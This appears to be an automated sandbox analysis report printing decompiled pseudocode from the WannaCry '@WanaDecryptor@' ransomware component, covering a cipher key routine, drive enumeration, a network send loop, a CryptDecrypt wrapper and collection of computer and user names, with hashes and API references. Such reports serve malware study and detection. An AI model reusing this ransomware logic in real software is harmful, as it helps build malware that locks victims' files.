				_t22 = _t236 + 0x3f0; // 0x444
				_t245 =  *(_t236 + 0x3cc) >> 2;
				memcpy(_t386 + _t245 + _t245, _t386, memcpy(_t22, _t386, _t245 << 2) & 0x00000003);
				_t403 = _t399 + 0x30;
				_t177 =  *(_t236 + 0x3c8);
				if(_t177 == 0x10) {
					_t178 =  *(_t236 + 0x3cc);
					if(_t178 != 0x10) {
						asm("sbb eax, eax");
						_t182 = ( ~(_t178 - 0x18) & 0x00000002) + 0xc;
					} else {
						_t182 = 0xa;
					}
					 *((intOrPtr*)(_t236 + 0x410)) = _t182;
				} else {
					if(_t177 == 0x18) {
						asm("sbb ecx, ecx");
						 *((intOrPtr*)(_t236 + 0x410)) = ( ~( *(_t236 + 0x3cc) - 0x20) & 0xfffffffe) + 0xe;
					} else {
						 *((intOrPtr*)(_t236 + 0x410)) = 0xe;
					}
				}
				asm("cdq");
				_t292 = 0;
				_t251 =  *(_t236 + 0x3cc) + (_t290 & 0x00000003) >> 2;
				 *(_t403 + 0x2c) = _t251;
				if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
					L23:
					_t293 = 0;
					if( *((intOrPtr*)(_t236 + 0x410)) < 0) {
						L28:
						_t44 = _t236 + 0x414; // 0x468
						_t387 = _t44;
						asm("cdq");
						_t353 = ( *((intOrPtr*)(_t236 + 0x410)) + 1) * _t251;
						 *(_t403 + 0x30) = _t353;
						_t189 =  *(_t403 + 0x24);
						_t395 =  *(_t236 + 0x3c8) + (_t293 & 0x00000003) >> 2;
						 *(_t403 + 0x10) = _t395;
						if(_t395 <= 0) {
							L31:
							_t388 = 0;
							if(_t395 <= 0) {
								L35:
								if(_t388 >= _t353) {
									L51:
									_t190 = 1;
									 *(_t403 + 0x30) = 1;
									if( *((intOrPtr*)(_t236 + 0x410)) <= 1) {
										L58:
										 *((char*)(_t236 + 4)) = 1;
										return _t190;
									}
									_t151 = _t236 + 0x208; // 0x25c
									_t397 = _t151;
									do {
										if(_t251 <= 0) {
											goto L57;
										}
										_t390 = _t397;
										_t355 = _t251;
										do {
											_t192 =  *_t390;
											 *(_t403 + 0x24) = _t192;
											_t390 =  &(_t390[1]);
											_t355 = _t355 - 1;
											 *(_t390 - 4) =  *0x004191B0 ^  *0x004195B0 ^  *0x004199B0 ^  *(0x419db0 + (_t192 & 0x000000ff) * 4);
										} while (_t355 != 0);
										_t251 =  *(_t403 + 0x2c);
										L57:
										_t190 =  *(_t403 + 0x30) + 1;
										_t397 =  &(_t397[8]);
										 *(_t403 + 0x30) = _t190;
									} while (_t190 <  *((intOrPtr*)(_t236 + 0x410)));
									goto L58;
								}
								 *(_t403 + 0x28) = 0x41a1b0;
								do {
									 *(_t403 + 0x24) =  *(_t236 + 0x410 + _t395 * 4);
									 *(_t236 + 0x414) =  *(_t236 + 0x414) ^ ((( *0x00416FB0 ^  *( *(_t403 + 0x28))) << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
									 *(_t403 + 0x28) =  *(_t403 + 0x28) + 1;
									if(_t395 == 8) {
										_t104 = _t236 + 0x418; // 0x46c
										_t198 = _t104;
										_t268 = 3;
										do {
											 *_t198 =  *_t198 ^  *(_t198 - 4);
											_t198 =  &(_t198[1]);
											_t268 = _t268 - 1;
										} while (_t268 != 0);
										 *(_t403 + 0x24) =  *(_t236 + 0x420);
										_t275 = 3;
										 *(_t236 + 0x424) =  *(_t236 + 0x424) ^ (( *0x00416FB0 << 0x00000008 ^ 0) << 0x00000008 ^ 0) << 0x00000008 ^ 0;
										_t116 = _t236 + 0x428; // 0x47c
										_t203 = _t116;
										do {
											 *_t203 =  *_t203 ^  *(_t203 - 4);
											_t203 =  &(_t203[1]);
											_t275 = _t275 - 1;
										} while (_t275 != 0);
										L46:
										 *(_t403 + 0x24) = 0;
										if(_t395 <= 0) {
											goto L50;
										}
										_t119 = _t236 + 0x414; // 0x468
										_t375 = _t119;
										while(1) {
											_t251 =  *(_t403 + 0x2c);
											if(_t388 >=  *(_t403 + 0x30)) {
												goto L51;
											}
											_t398 =  *_t375;
											asm("cdq");
											_t375 = _t375 + 4;
											_t276 = _t388 / _t251;
											asm("cdq");
											_t317 = _t388 %  *(_t403 + 0x2c);
											 *((intOrPtr*)(_t236 + 8 + (_t317 + _t276 * 8) * 4)) = _t398;
											_t395 =  *(_t403 + 0x10);
											_t214 =  *(_t403 + 0x24) + 1;
											_t388 = _t388 + 1;
											 *((intOrPtr*)(_t236 + 0x1e8 + (_t317 + ( *((intOrPtr*)(_t236 + 0x410)) - _t276) * 8) * 4)) =  *((intOrPtr*)(_t375 - 4));
											 *(_t403 + 0x24) = _t214;
											if(_t214 < _t395) {
												continue;
											}
											goto L50;
										}
										goto L51;
									}
									if(_t395 <= 1) {
										goto L46;
									}
									_t101 = _t236 + 0x418; // 0x46c
									_t215 = _t101;
									_t278 = _t395 - 1;
									do {
										 *_t215 =  *_t215 ^  *(_t215 - 4);
										_t215 =  &(_t215[1]);
										_t278 = _t278 - 1;
									} while (_t278 != 0);
									goto L46;
									L50:
									_t251 =  *(_t403 + 0x2c);
								} while (_t388 <  *(_t403 + 0x30));
								goto L51;
							}
							_t58 = _t236 + 0x414; // 0x468
							 *(_t403 + 0x24) = _t58;
							while(_t388 < _t353) {
								asm("cdq");
								_t378 = _t388 / _t251;
								asm("cdq");
								_t321 = _t388 % _t251;
								 *(_t403 + 0x28) = _t321;
								 *((intOrPtr*)(_t236 + 8 + (_t321 + _t378 * 8) * 4)) =  *( *(_t403 + 0x24));
								_t388 = _t388 + 1;
								_t224 =  *(_t403 + 0x24);
								 *((intOrPtr*)(_t236 + 0x1e8 + ( *(_t403 + 0x28) + ( *((intOrPtr*)(_t236 + 0x410)) - _t378) * 8) * 4)) =  *_t224;
								_t353 =  *(_t403 + 0x30);
								 *(_t403 + 0x24) = _t224 + 4;
								if(_t388 < _t395) {
									continue;
								}
								goto L35;
							}
							goto L51;
						}
						 *(_t403 + 0x24) = _t395;
						do {
							_t387 = _t387 + 4;
							 *(_t387 - 4) = 0 << 0x18;
							 *(_t387 - 4) =  *(_t387 - 4) | 0 << 0x00000010;
							_t189 = _t189 + 4;
							_t337 =  *(_t403 + 0x24) - 1;
							 *(_t403 + 0x24) = _t337;
						} while (_t337 != 0);
						goto L31;
					}
					_t38 = _t236 + 0x1e8; // 0x23c
					_t391 = _t38;
					do {
						if(_t251 > 0) {
							memset(_t391, 0, _t251 << 2);
							_t403 = _t403 + 0xc;
							_t251 =  *(_t403 + 0x2c);
						}
						_t293 = _t293 + 1;
						_t391 = _t391 + 0x20;
					} while (_t293 <=  *((intOrPtr*)(_t236 + 0x410)));
					goto L28;
				} else {
					_t33 = _t236 + 8; // 0x5c
					_t392 = _t33;
					do {
						if(_t251 > 0) {
							memset(_t392, 0, _t251 << 2);
							_t403 = _t403 + 0xc;
							_t251 =  *(_t403 + 0x2c);
						}
						_t292 = _t292 + 1;
						_t392 = _t392 + 0x20;
					} while (_t292 <=  *((intOrPtr*)(_t236 + 0x410)));
					goto L23;
				}
			}

0x0040a15a
0x0040a15c
0x0040a167
0x0040a16f
0x0040a179
0x0040a17e
0x0040a17f
0x0040a17f
0x0040a184
0x0040a18b
0x0040a1a0
0x0040a1a8
0x0040a1ae
0x0040a1b2
0x0040a1b7
0x0040a1b8
0x0040a1b8
0x0040a1bd
0x0040a1c4
0x0040a1d4
0x0040a1dd
0x0040a1e1
0x0040a1eb
0x0040a1f0
0x0040a1f1
0x0040a1f1
0x0040a1f7
0x0040a201
0x0040a208
0x0040a20b
0x0040a20d
0x0040a213
0x0040a216
0x0040a225
0x0040a229
0x0040a22f
0x0040a239
0x0040a239
0x0040a23b
0x0040a244
0x0040a272
0x0040a27b
0x0040a289
0x0040a28e
0x0040a27d
0x0040a27d
0x0040a27d
0x0040a291
0x0040a246
0x0040a249
0x0040a262
0x0040a26a
0x0040a24b
0x0040a24b
0x0040a24b
0x0040a249
0x0040a29d
0x0040a2a3
0x0040a2ad
0x0040a2b2
0x0040a2b6
0x0040a2d7
0x0040a2dd
0x0040a2e1
0x0040a305
0x0040a312
0x0040a312
0x0040a318
0x0040a319
0x0040a31f
0x0040a327
0x0040a32b
0x0040a330
0x0040a334
0x0040a36e
0x0040a36e
0x0040a372
0x0040a3cf
0x0040a3d1
0x0040a576
0x0040a57c
0x0040a583
0x0040a587
0x0040a5f3
0x0040a5f5
0x0040a5fe
0x0040a5fe
0x0040a589
0x0040a589
0x0040a58f
0x0040a591
0x00000000
0x00000000
0x0040a593
0x0040a595
0x0040a597
0x0040a597
0x0040a59b
0x0040a5a5
0x0040a5d3
0x0040a5d4
0x0040a5d4
0x0040a5d9
0x0040a5dd
0x0040a5e7
0x0040a5e8
0x0040a5ed
0x0040a5ed
0x00000000
0x0040a58f
0x0040a3d7
0x0040a3df
0x0040a3e8
0x0040a446
0x0040a44c
0x0040a450
0x0040a478
0x0040a478
0x0040a47e
0x0040a483
0x0040a48a
0x0040a48c
0x0040a48f
0x0040a48f
0x0040a49a
0x0040a4e0
0x0040a4ec
0x0040a4f2
0x0040a4f2
0x0040a4f8
0x0040a4ff
0x0040a501
0x0040a504
0x0040a504
0x0040a507
0x0040a509
0x0040a511
0x00000000
0x00000000
0x0040a513
0x0040a513
0x0040a519
0x0040a51d
0x0040a523
0x00000000
0x00000000
0x0040a527
0x0040a529
0x0040a52c
0x0040a52f
0x0040a533
0x0040a534
0x0040a53b
0x0040a545
0x0040a555
0x0040a556
0x0040a559
0x0040a560
0x0040a564
0x00000000
0x00000000
0x00000000
0x0040a564
0x00000000
0x0040a519
0x0040a455
0x00000000
0x00000000
0x0040a45b
0x0040a45b
0x0040a461
0x0040a464
0x0040a46b
0x0040a46d
0x0040a470
0x0040a470
0x00000000
0x0040a566
0x0040a56a
0x0040a56e
0x00000000
0x0040a3df
0x0040a374
0x0040a37a
0x0040a37e
0x0040a388
0x0040a38b
0x0040a38f
0x0040a390
0x0040a392
0x0040a39f
0x0040a3af
0x0040a3b3
0x0040a3bc
0x0040a3c3
0x0040a3c9
0x0040a3cd
0x00000000
0x00000000
0x00000000
0x0040a3cd
0x00000000
0x0040a37e
0x0040a336
0x0040a33a
0x0040a33c
0x0040a344
0x0040a34f
0x0040a366
0x0040a367
0x0040a368
0x0040a368
0x00000000
0x0040a33a
0x0040a2e3
0x0040a2e3
0x0040a2e9
0x0040a2eb
0x0040a2f1
0x0040a2f1
0x0040a2f3
0x0040a2f3
0x0040a2fd
0x0040a2fe
0x0040a301
0x00000000
0x0040a2b8
0x0040a2b8
0x0040a2b8
0x0040a2bb
0x0040a2bd
0x0040a2c3
0x0040a2c3
0x0040a2c5
0x0040a2c5
0x0040a2cf
0x0040a2d0
0x0040a2d3
0x00000000
0x0040a2bb

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
_CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
_CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
_CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrow
String ID:
API String ID: 941485209-0
Opcode ID: 1e118166748c2516ccf34b16e56ce24d223970c5c76bb6d30bfc94f2d512404d
Instruction ID: fb0ef9a6f766abd1277d4fb3e7775c965cb771230ee66441beda5a672c207522
Opcode Fuzzy Hash: 1e118166748c2516ccf34b16e56ce24d223970c5c76bb6d30bfc94f2d512404d
Instruction Fuzzy Hash: 57E1E4716043458BD718CF29C4906AAB7E2BFCC308F09857EE889EB355DB34D941CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00403A20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403A20(intOrPtr _a4, intOrPtr _a8) {
				union _ULARGE_INTEGER _v8;
				union _ULARGE_INTEGER _v16;
				intOrPtr _v20;
				union _ULARGE_INTEGER _v24;
				short _v28;
				short _v32;
				short _t23;
				short _t34;
				signed int _t47;
				unsigned int _t50;

				if( *((intOrPtr*)(_a8 + 8)) != 0) {
					return 1;
				} else {
					_t50 = GetLogicalDrives();
					_t47 = 2;
					do {
						if((_t50 >> _t47 & 0x00000001) != 0) {
							_t23 =  *L" : "; // 0x3a0020
							_t34 =  *0x420760; // 0x20
							_v32 = _t23;
							_t7 = _t47 + 0x41; // 0x43
							_v28 = _t34;
							_v32 = _t7;
							_v28 = 0x5c;
							if(GetDriveTypeW( &_v32) != 5 && GetDiskFreeSpaceExW( &_v32,  &_v8,  &_v24,  &_v16) != 0 && (_v20 > 0 || _v24.LowPart > 0)) {
								_v28 = 0;
								E004026B0(_a4,  &_v32);
							}
						}
						_t47 = _t47 + 1;
					} while (_t47 <= 0x19);
					return 1;
				}
			}

0x00403a2c
0x00403ae4
0x00403a32
0x00403a41
0x00403a43
0x00403a48
0x00403a51
0x00403a53
0x00403a58
0x00403a5e
0x00403a66
0x00403a69
0x00403a6e
0x00403a73
0x00403a7f
0x00403ab8
0x00403abf
0x00403abf
0x00403a7f
0x00403ac4
0x00403ac5
0x00403ad9
0x00403ad9

APIs

GetLogicalDrives.KERNEL32 ref: 00403A35
GetDriveTypeW.KERNEL32 ref: 00403A7A
GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95

Strings

\, xrefs: 00403A73
: , xrefs: 00403A53

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: DiskDriveDrivesFreeLogicalSpaceType
String ID: : $\
API String ID: 222820107-856521285
Opcode ID: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
Instruction ID: 7a2fb974cbacd17fa61847377d7cab912bc040039a87a27a6beb81165ce83d4b
Opcode Fuzzy Hash: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
Instruction Fuzzy Hash: 2D116D31614301ABD315DF15D884AABBBE8FBC8710F04882EF88597290E775E948CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040D300 Relevance: 6.2, APIs: 4, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040D300(intOrPtr* __ecx, void* _a4, void* _a8, void* _a12, void* _a16) {
				void _v1024;
				char _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				void* _v1040;
				intOrPtr _v1044;
				char _v1048;
				signed int _t34;
				void* _t36;
				intOrPtr _t37;
				void* _t43;
				void* _t45;
				intOrPtr _t46;
				void* _t49;
				signed int _t58;
				intOrPtr* _t60;
				signed int _t70;
				signed int _t71;
				signed int _t78;
				void* _t83;
				void* _t91;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void** _t107;
				void** _t109;

				_t106 =  &_v1040;
				_t105 = _a8;
				_t60 = __ecx;
				_v1032 = 0;
				if(_t105 != 0) {
					_t34 = E0040D5D0(__ecx);
					__eflags = _t34;
					if(_t34 != 0) {
						__eflags = _a12;
						if(_a12 == 0) {
							_t36 = _a4;
							_v1040 = _t36;
							_t91 = _t36;
							goto L13;
						} else {
							__eflags = _a16;
							if(_a16 != 0) {
								__eflags = _t105 - 0x400;
								if(_t105 > 0x400) {
									_t49 = E00412A90(_t105);
									_t109 =  &(( &_v1040)[1]);
									_v1040 = _t49;
									__eflags = _t49;
									if(_t49 != 0) {
										_t103 = _a4;
										_t70 = _t105;
										_t71 = _t70 >> 2;
										memcpy(_t49, _t103, _t71 << 2);
										memcpy(_t103 + _t71 + _t71, _t103, _t70 & 0x00000003);
										_t106 =  &(_t109[6]);
										_t91 = _v1040;
										E0040D2B0(_t60, _t91, _t105);
										goto L13;
									} else {
										return _t49;
									}
								} else {
									_t104 = _a4;
									_t78 = _t105 >> 2;
									memcpy(_t104 + _t78 + _t78, _t104, memcpy( &_v1024, _t104, _t78 << 2) & 0x00000003);
									_t106 =  &(( &_v1040)[6]);
									_t83 =  &_v1024;
									_t91 = _t83;
									_v1040 = _t83;
									E0040D2B0(_t60, _t91, _t105);
									goto L13;
								}
							} else {
								_t91 = _a4;
								E0040D2B0(__ecx, _t91, _t105);
								L13:
								_push( &_v1028);
								L0041303E();
								_t37 = _v1028;
								_t107 =  &(_t106[1]);
								_t102 = 0;
								_v1036 = _t37;
								__eflags = _t105;
								if(_t105 > 0) {
									while(1) {
										__eflags = _t37 - _v1028 -  *((intOrPtr*)(_t60 + 0x28));
										if(_t37 - _v1028 >  *((intOrPtr*)(_t60 + 0x28))) {
											goto L25;
										}
										_t43 =  *((intOrPtr*)( *_t60 + 0x20))( *((intOrPtr*)(_t60 + 4)), _t91 + _t102, _t105 - _t102);
										__eflags = _t43;
										if(__eflags > 0) {
											_t102 = _t102 + _t43;
											__eflags = _t102;
											_push( &_v1048);
											goto L24;
										} else {
											if(__eflags != 0) {
												_t45 =  *((intOrPtr*)( *_t60 + 0x28))();
												__eflags = _t45 - 0x2733;
												if(_t45 == 0x2733) {
													_t46 = _v1044;
													__eflags = _t46 - 0x64;
													_v1044 = _t46 + 1;
													if(_t46 > 0x64) {
														Sleep(0x64);
														_v1044 = 0;
													}
													_push( &_v1048);
													L24:
													L0041303E();
													_t107 =  &(_t107[1]);
													__eflags = _t102 - _t105;
													if(_t102 < _t105) {
														_t37 = _v1048;
														continue;
													}
												}
											}
										}
										goto L25;
									}
								}
								L25:
								__eflags = _t91 - _a4;
								if(_t91 != _a4) {
									__eflags = _t91 -  &_v1024;
									if(_t91 !=  &_v1024) {
										__eflags = _t91;
										if(_t91 != 0) {
											free(_t91);
										}
									}
								}
								return _t102;
							}
						}
					} else {
						_t58 = _t34 | 0xffffffff;
						__eflags = _t58;
						return _t58;
					}
				} else {
					return 0;
				}
			}

0x0040d300
0x0040d308
0x0040d313
0x0040d315
0x0040d31d
0x0040d330
0x0040d335
0x0040d337
0x0040d350
0x0040d352
0x0040d3f6
0x0040d3fd
0x0040d401
0x00000000
0x0040d358
0x0040d35f
0x0040d361
0x0040d378
0x0040d37e
0x0040d3b1
0x0040d3b6
0x0040d3b9
0x0040d3bd
0x0040d3bf
0x0040d3ce
0x0040d3d5
0x0040d3db
0x0040d3de
0x0040d3e6
0x0040d3e6
0x0040d3e8
0x0040d3ef
0x00000000
0x0040d3cb
0x0040d3cb
0x0040d3cb
0x0040d380
0x0040d380
0x0040d38f
0x0040d39a
0x0040d39a
0x0040d39c
0x0040d3a0
0x0040d3a2
0x0040d3a9
0x00000000
0x0040d3a9
0x0040d363
0x0040d363
0x0040d36e
0x0040d403
0x0040d407
0x0040d408
0x0040d40d
0x0040d411
0x0040d414
0x0040d416
0x0040d41a
0x0040d41c
0x0040d424
0x0040d42d
0x0040d42f
0x00000000
0x00000000
0x0040d442
0x0040d445
0x0040d447
0x0040d480
0x0040d480
0x0040d486
0x00000000
0x0040d449
0x0040d449
0x0040d44f
0x0040d452
0x0040d457
0x0040d459
0x0040d460
0x0040d463
0x0040d467
0x0040d46b
0x0040d471
0x0040d471
0x0040d47d
0x0040d487
0x0040d487
0x0040d48c
0x0040d48f
0x0040d491
0x0040d420
0x00000000
0x0040d420
0x0040d491
0x0040d457
0x0040d449
0x00000000
0x0040d447
0x0040d424
0x0040d493
0x0040d493
0x0040d49a
0x0040d4a0
0x0040d4a2
0x0040d4a4
0x0040d4a6
0x0040d4a9
0x0040d4ae
0x0040d4a6
0x0040d4a2
0x0040d4bd
0x0040d4bd
0x0040d361
0x0040d33c
0x0040d33c
0x0040d33c
0x0040d346
0x0040d346
0x0040d322
0x0040d32b
0x0040d32b

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8f85ea80c3b6b8e9e311ac575965a537163168bbe12e9f95371609f99db3755
Instruction ID: 8719850658187d05665d4daca0cd16b7f92190a52f2d7545724c4cd71ae93cac
Opcode Fuzzy Hash: c8f85ea80c3b6b8e9e311ac575965a537163168bbe12e9f95371609f99db3755
Instruction Fuzzy Hash: 7A41D7B2B042044BC724DE6898506BFB7D5EBD4314F40093FF946A3381DA79ED4D869A

Uniqueness

Uniqueness Score: -1.00%

Function 00404AF0 Relevance: 6.1, APIs: 4, Instructions: 51
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00404AF0(void* __ecx, void* _a4, int _a8) {
				intOrPtr* _v4;
				void* _v8;
				signed int _v12;
				int _t12;
				void* _t19;
				signed int _t22;
				signed int _t23;
				struct _CRITICAL_SECTION* _t30;
				void* _t36;

				_t19 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) != 0) {
					_t2 = _t19 + 0x10; // 0x14
					_t30 = _t2;
					EnterCriticalSection(_t30);
					_t36 = _a4;
					_t12 = CryptDecrypt( *(_t19 + 8), 0, 1, 0, _t36,  &_a8);
					_push(_t30);
					if(_t12 != 0) {
						LeaveCriticalSection();
						_t22 = _v12;
						_t23 = _t22 >> 2;
						memcpy(_v8, _t36, _t23 << 2);
						 *_v4 = memcpy(_t36 + _t23 + _t23, _t36, _t22 & 0x00000003);
						return 1;
					} else {
						LeaveCriticalSection();
						return 0;
					}
				} else {
					return 0;
				}
			}

0x00404af1
0x00404afa
0x00404b04
0x00404b04
0x00404b08
0x00404b0e
0x00404b22
0x00404b2a
0x00404b2b
0x00404b3b
0x00404b49
0x00404b4d
0x00404b50
0x00404b60
0x00404b67
0x00404b2d
0x00404b2d
0x00404b38
0x00404b38
0x00404afe
0x00404b01
0x00404b01

APIs

EnterCriticalSection.KERNEL32(00000014,00000000,00000000,00000000,0040234D,?,00000100,?,?), ref: 00404B08
CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 00404B22
LeaveCriticalSection.KERNEL32(00000014), ref: 00404B2D

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: CriticalSection$CryptDecryptEnterLeave
String ID:
API String ID: 1395129968-0
Opcode ID: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
Instruction ID: c9397fa3391ecaa6db63de0f595bcff8412a7be4ee2956e3e45acdf047351e7f
Opcode Fuzzy Hash: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
Instruction Fuzzy Hash: 15017C323002049BD714CE65E888BAB77A9FBC9721F44883AFA42D7281D7B0E809C671

Uniqueness

Uniqueness Score: -1.00%

Function 0040BED0 Relevance: 4.6, APIs: 3, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0040BED0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				char _v0;
				char _v4;
				intOrPtr _v12;
				intOrPtr _v36;
				void _v311;
				char _v312;
				char _v332;
				char _v572;
				void _v611;
				char _v612;
				intOrPtr _v616;
				long _v620;
				char _v633;
				intOrPtr _t29;
				signed int _t30;
				signed int _t32;
				signed int _t50;
				char _t51;
				char _t54;
				signed int _t67;
				intOrPtr _t83;

				_t29 =  *[fs:0x0];
				_t50 =  *0x422210; // 0xa94228
				_push(0xffffffff);
				_push(E0041429E);
				_push(_t29);
				 *[fs:0x0] = _t83;
				if(_t50 != 0) {
					_t29 =  *((intOrPtr*)( *_t50 + 0xc))();
					_t67 =  *0x422210; // 0xa94228
					if(_t67 != 0) {
						_t29 =  *((intOrPtr*)( *_t67))(1);
					}
				}
				_push(0x2c);
				L00412CEC();
				_v616 = _t29;
				_v4 = 0;
				if(_t29 == 0) {
					_t30 = 0;
				} else {
					_t30 = E0040D5E0(_t29);
				}
				_v4 = 0xffffffff;
				 *0x422210 = _t30;
				if(_t30 != 0) {
					_push(_a4);
					_t32 = E0040BAF0();
					if(_t32 == 0) {
						_t51 =  *0x421798; // 0x0
						_v612 = _t51;
						memset( &_v611, 0, 0x4a << 2);
						asm("stosw");
						asm("stosb");
						_v620 = 0x12b;
						GetComputerNameA( &_v612,  &_v620);
						_t54 =  *0x421798; // 0x0
						_v312 = _t54;
						memset( &_v311, 0, 0x4a << 2);
						asm("stosw");
						asm("stosb");
						_v572 = 0;
						_v620 = 0x12b;
						GetUserNameA( &_v312,  &_v620);
						_push(8);
						_push(_a8);
						E0040DC00(_a16);
						E0040DD00(_a16,  &_v620);
						_push(1);
						_push( &_v633);
						_v633 = _v0;
						E0040DC00(_a16);
						E0040DD00(_a16,  &_v332);
						 *[fs:0x0] = _v36;
						return 0;
					} else {
						 *[fs:0x0] = _v12;
						return _t32 | 0xffffffff;
					}
				} else {
					 *[fs:0x0] = _v12;
					return _t30 | 0xffffffff;
				}
			}

0x0040bed0
0x0040bed6
0x0040bedc
0x0040bede
0x0040bee3
0x0040bee4
0x0040bef3
0x0040bef7
0x0040befa
0x0040bf02
0x0040bf08
0x0040bf08
0x0040bf02
0x0040bf0a
0x0040bf0c
0x0040bf14
0x0040bf1a
0x0040bf25
0x0040bf30
0x0040bf27
0x0040bf29
0x0040bf29
0x0040bf34
0x0040bf3f
0x0040bf44
0x0040bf65
0x0040bf66
0x0040bf70
0x0040bf8a
0x0040bf92
0x0040bfa5
0x0040bfa7
0x0040bfa9
0x0040bfb5
0x0040bfb9
0x0040bfbf
0x0040bfc7
0x0040bfde
0x0040bfe0
0x0040bfe2
0x0040bfec
0x0040bff1
0x0040bff5
0x0040c009
0x0040c00b
0x0040c00e
0x0040c01a
0x0040c02a
0x0040c02c
0x0040c02f
0x0040c033
0x0040c042
0x0040c052
0x0040c05f
0x0040bf72
0x0040bf7c
0x0040bf89
0x0040bf89
0x0040bf46
0x0040bf50
0x0040bf5d
0x0040bf5d

APIs

#823.MFC42(0000002C), ref: 0040BF0C
GetComputerNameA.KERNEL32(?,?), ref: 0040BFB9
GetUserNameA.ADVAPI32 ref: 0040BFF5

Part of subcall function 0040DC00: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040DC9E
Part of subcall function 0040DC00: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040DCAD

Memory Dump Source

Source File: 0000001B.00000002.5854333958.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.5854243846.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854674595.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5854906249.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855003170.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000001B.00000002.5855085880.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_@WanaDecryptor@.jbxd

Yara matches

Similarity

API ID: Name$#823??0exception@@ComputerExceptionThrowUser
String ID:
API String ID: 2582426243-0
